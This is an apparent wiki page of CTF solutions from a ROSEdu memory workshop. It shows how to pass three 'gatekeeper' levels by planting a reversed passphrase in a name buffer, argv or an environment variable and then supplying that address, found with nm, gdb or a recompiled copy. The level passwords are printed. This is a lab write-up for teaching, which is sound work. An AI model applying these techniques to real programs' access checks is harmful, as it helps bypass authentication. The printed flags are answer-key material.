Show pagesourceOld revisions
Recent ChangesSitemap

Gatekeeper

This set of tasks requires you to enter a password in order to print the flag for the next level, but there's a catch: you don't enter a password, you need to enter a memory address

Gatekeeper_01

We know that the address given is checked against the contents in secret_pass[] so we can make it check against itself. secret_pass[] is a global variable so we can find out its address using 'nm'. 

gatekeeper_01@dmns-VirtualBox:~$ nm gatekeeper_01 | grep secret_pass
0804a008 D secret_pass
gatekeeper_01@dmns-VirtualBox:~$ ./gatekeeper_01
Welcome to <<Gate 1>> human, what is your name?
Robot
What is the passphrase Robot? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
0x0804a008
Checking contents of 0x804a008
Access granted! The password to gatekeeper_02 is:
657a609fb15bfb8aa11d4566143e11eb

Gatekeeper_02

This one is more problematic because you need to give it an address of a buffer where the password is stored in reverse order so you can't use the previous trick. However, there is still something that we control: the name buffer. It's a global variable like before so we could just use 'nm' to find its address and enter the password in reverse order there. 

gatekeeper_02@dmns-VirtualBox:~$ nm gatekeeper_02 | grep name
0804a024 B name
gatekeeper_02@dmns-VirtualBox:~$ python
>>> "ultra_secret_passw0rd"[::-1]
'dr0wssap_terces_artlu'
gatekeeper_02@dmns-VirtualBox:~$ ./gatekeeper_02
Welcome to <<Gate 2>> human, what is your name?
dr0wssap_terces_artlu
What is the passphrase dr0wssap_terces_artlu? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
But this time, the passphrase should be stored in reverse order at that address!
0x0804a024
Checking contents of 0x804a024
Access granted! The password to gatekeeper_03 is:
d7e3fb11c279ca1eb7df1039880f20f5

Gatekeeper_03

This was a bonus challenge with increased difficulty because there is seemingly no possible input from the user except for the actual address. The hint was: “what happens before main() is called?” and the answer is that even though main is not specified with argc, argv and envp arguments at compilation time, these are still present on the stack. This leads to three slightly different solutions, each being solvable with gdb or with a local recompilation. Recompilation method: although you can't modify the original binary you can make a copy for yourself and add extra printf() calls: 

+ int main(int argc, char **argv)
{
        char addr_buf[11];
        unsigned long addr = 0;
 
        char *addr_ptr = NULL;
        int i, len = strlen(secret_pass);
+       printf("Address of argv[0] is %p\n", argv[0]);
+       printf("Address of argv[1] is %p\n", argv[1]);
+       printf("Address of PASS env var is %p\n", getenv("PASS"));
        printf("Welcome to " TERM_GREEN "<<Gate 3>>" TERM_RESET " human, I know your name from last time\n");
gatekeeper_03@dmns-VirtualBox:~$ gcc -Wall gatekeeper_03_mod.c -o my_gatekeeper_03 -m32
gatekeeper_03@dmns-VirtualBox:~$ ./my_gatekeeper_03 
Address of argv[0] is 0xffffd872
Address of argv[1] is (nil)
Address of PASS env var is (nil)
Welcome to <<Gate 3>> human, I know your name from last time

Ok, so let's solve it using argv[1]: 

gatekeeper_03@dmns-VirtualBox:~$ ./my_gatekeeper_03 dr0wssap_terces_agem
Address of argv[0] is 0xffffd85d
Address of argv[1] is 0xffffd870
Address of PASS env var is (nil)
gatekeeper_03@dmns-VirtualBox:~$ ./gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd870
Checking contents of 0xffffd870
Wrong!The content there is [er_03]
#Note that there is a minor address difference because of using another binary
gatekeeper_03@dmns-VirtualBox:~$ ./gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd876
Checking contents of 0xffffd876
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

Now, let's use an environment variable: 

gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./my_gatekeeper_03 
Address of argv[0] is 0xffffd858
Address of argv[1] is (nil)
Address of PASS env var is 0xffffd870
Welcome to <<Gate 3>> human, I know your name from last time
gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./gatekeeper_03 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd870
Checking contents of 0xffffd870
Wrong!The content there is []
#Oops, the misalignment landed right into a string terminator, let's check from the next byte
gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./gatekeeper_03 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd871
Checking contents of 0xffffd871
Wrong!The content there is [PASS=dr0wssap_terces_agem]
gatekeeper_03@dmns-VirtualBox:~$ PASS=dr0wssap_terces_agem ./gatekeeper_03 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd876
Checking contents of 0xffffd876
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

Last solution implies changing argv[0] itself. This is my favorite solution: 

gatekeeper_03@dmns-VirtualBox:~$ ln -s my_gatekeeper_03 dr0wssap_terces_agem
gatekeeper_03@dmns-VirtualBox:~$ ./dr0wssap_terces_agem 
Address of argv[0] is 0xffffd866
Address of argv[1] is (nil)
Address of PASS env var is (nil)
gatekeeper_03@dmns-VirtualBox:~$ rm dr0wssap_terces_agem 
gatekeeper_03@dmns-VirtualBox:~$ ln -s gatekeeper_03 dr0wssap_terces_agem
gatekeeper_03@dmns-VirtualBox:~$ ./dr0wssap_terces_agem 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd866
Checking contents of 0xffffd866
Wrong!The content there is [./dr0wssap_terces_agem]
gatekeeper_03@dmns-VirtualBox:~$ ./dr0wssap_terces_agem 
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd868
Checking contents of 0xffffd868
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

Gdb method: Basically the same approach after finding out the correct addresses in a controlled setup 

gatekeeper_03@dmns-VirtualBox:~$ gdb ./gatekeeper_03
Reading symbols from /home/gatekeeper_03/gatekeeper_03...done.
(gdb) break *main
Breakpoint 1 at 0x80485ec: file gatekeeper_03.c, line 19.
(gdb) run dr0wssap_terces_agem
Starting program: /home/gatekeeper_03/gatekeeper_03 dr0wssap_terces_agem
 
Breakpoint 1, main () at gatekeeper_03.c:19
19	{
#arguments start at the next word after the current stack pointer => $sp + 4
(gdb) x /8wx $sp+4
0xffffd680:	0x00000002	0xffffd714	0xffffd720	0xf7fda858
0xffffd690:	0x00000000	0xffffd71c	0xffffd720	0xf7fb81c8
#0x00000002 is argc
#0xffffd714 is argv
#0xffffd720 is envp
(gdb) x /2s *0xffffd714
0xffffd840:	 "/home/gatekeeper_03/gatekeeper_03"
0xffffd862:	 "dr0wssap_terces_agem"
(gdb) x /2s *0xffffd720
0xffffd877:	 "SHELL=/bin/bash"
0xffffd887:	 "TERM=xterm"
(gdb) quit
#note that gdb starts a process using absolute path
gatekeeper_03@dmns-VirtualBox:~$ /home/gatekeeper_03/gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd862 
Checking contents of 0xffffd862
Wrong!The content there is [agem]
gatekeeper_03@dmns-VirtualBox:~$ /home/gatekeeper_03/gatekeeper_03 dr0wssap_terces_agem
Welcome to <<Gate 3>> human, I know your name from last time
What is the passphrase? Give me a memory address of where it is and you shall be granted access
Enter the address in hex like so: 0x123ABC
Like last time, the passphrase should be stored in reverse order at that address!
0xffffd852
Checking contents of 0xffffd852
Access granted! The final password is:
1baaf32f105ba8765de805abe47df0dd

Pagini

Workshops

Organizatori


Parteneri


Table of Contents

sesiuni/memory/ctf_sols/gatekeeper.txt · Last modified: 2013/07/19 04:24 by rcaragea
Show pagesourceOld revisions
BacklinksBack to top
© 2013 ROSEdu | Facultatea de Automatică și Calculatoare